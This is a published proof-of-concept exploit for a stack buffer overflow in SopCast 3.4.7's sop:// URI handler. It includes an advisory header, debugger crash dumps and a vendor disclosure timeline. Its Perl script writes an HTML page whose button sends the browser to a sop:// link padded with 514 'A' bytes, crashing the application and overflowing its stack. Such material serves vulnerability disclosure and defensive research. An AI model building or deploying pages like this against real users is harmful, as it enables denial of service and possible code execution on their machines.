SopCast 3.4.7 - 'sop://' URI Handling Remote Stack Buffer Overflow (PoC)

#!/usr/bin/perl
#
#
# SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC
#
#
# Vendor: SopCast.com
# Product web page: http://www.sopcast.com
# Affected version: 3.4.7.45585
#
# Summary: SopCast is a simple, free way to broadcast video and audio or watch
# the video and listen to radio on the Internet. Adopting P2P(Peer-to-Peer)
# technology, It is very efficient and easy to use. SoP is the abbreviation for
# Streaming over P2P. Sopcast is a Streaming Direct Broadcasting System based
# on P2P. The core is the communication protocol produced by Sopcast Team, which
# is named sop://, or SoP technology.
#
# Desc: SopCast suffers from a stack-based buffer overflow vulnerability when
# parsing the user input using the SoP protocol in sopocx.ocx module allowing
# the attacker to gain system access and execute arbitrary code on the affected
# machine. The issue is triggered when adding 514 bytes of string to the sop://
# protocol (GET), causing the app to open the link (channel) and crashing. The
# application will crash even with 'sop://[anything]' because it fails to properly
# sanitize and handle the uri segment, but with exactly 514 bytes the stack gets
# overflowed, poping out the Buffer Overrun error box. Unsuccessful atempts causes
# denial of service scenario. You can also edit the '<address>' element in the
# favorites.xml file as the attack vector.
#
#
# ================================================================================
#
# (e50.fcc): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=01092f48 ebx=00f8e8e8 ecx=000000b7 edx=0116a7dc esi=00000001 edi=0104af88
# eip=100a350f esp=0618febc ebp=0618ffa8 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# *** WARNING: Unable to verify checksum for C:\PROGRA~1\SopCast\sopocx.ocx
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\PROGRA~1\SopCast\sopocx.ocx - 
# sopocx!DllUnregisterServer+0x9217f:
# 100a350f 0fb606          movzx   eax,byte ptr [esi]         ds:0023:00000001=??
# ...
# 0:000> d esp+400
# 0012ea78  18 10 ea 00 73 00 6f 00-70 00 3a 00 2f 00 2f 00  ....s.o.p.:././.
# 0012ea88  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012ea98  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012eaa8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012eab8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012eac8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012ead8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0012eae8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# ...
# 0:008> d edx+1000
# 00f2f8b0  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f8c0  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f8d0  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f8e0  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f8f0  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f900  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f910  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f2f920  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 0:008> d eax+2000
# 00f320e8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f320f8  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32108  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32118  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32128  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32138  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32148  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
# 00f32158  61 00 61 00 61 00 61 00-61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
#
# ================================================================================
#
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Vendor status:
#
# [30.11.2011] Vulnerability discovered.
# [01.12.2011] Contact with the vendor with sent detailed info.
# [04.12.2011] No response from the vendor.
# [05.12.2011] Public security advisory released.
#
#
# Advisory ID: ZSL-2011-5063
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5063.php
#
#
# 30.11.2011
#

use strict;
 
my $fname = "thricer.html";

print "\n\nooooooooooooooooooooooooooooooooooooooooooooooooo\no"." "x47 ."o\n";
print "o\tSopCast 3.4.7 URI Handling BoF PoC" . " "x6 . "o\no"." "x47 ."o\no\t\t";
print "ID: ZSL-2011-5063"." "x15 ."o\no"." "x47 ."o\n";
print "o\tCopyleft (c) 2011, Zero Science Lab"." "x5 ."o\no"." "x47 ."o\n";
print "ooooooooooooooooooooooooooooooooooooooooooooooooo\n\n";

my $curiosity = "\n</center>\n</body>\n</html>";
my $unknown = "<form>\n<input type=\"button\" value=\"Push The Button!\" ";
my $with = "onclick=\"exploit()\" />" . "\n</form>";
my $of = "<body bgcolor=\"#002233\">\n<br /><br />\n<center>\n";
my $fear = "</script>\n</head>\n";
my $replace = "<html>\n<head>\n<title>".
              "SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer".
              " Overflow PoC</title>\n".
              "<script type=\"text/javascript\">\n";
my $code = "window.location.href = \"sop://"."A"x514 ."\";\n";
my $the = "function exploit()\n{\n" . $code . "}\n";

my $payload = $replace.$the.$fear.$of.$unknown.$with.$curiosity;
 
print "\n\n[*] Creating $fname file...\n";
open ENOUGH, ">./$fname" || die "\nCan't open $fname: $!";
print ENOUGH $payload; print "\n"; sleep 1;
print "\n[.] File successfully scripted!\n\n";
close ENOUGH;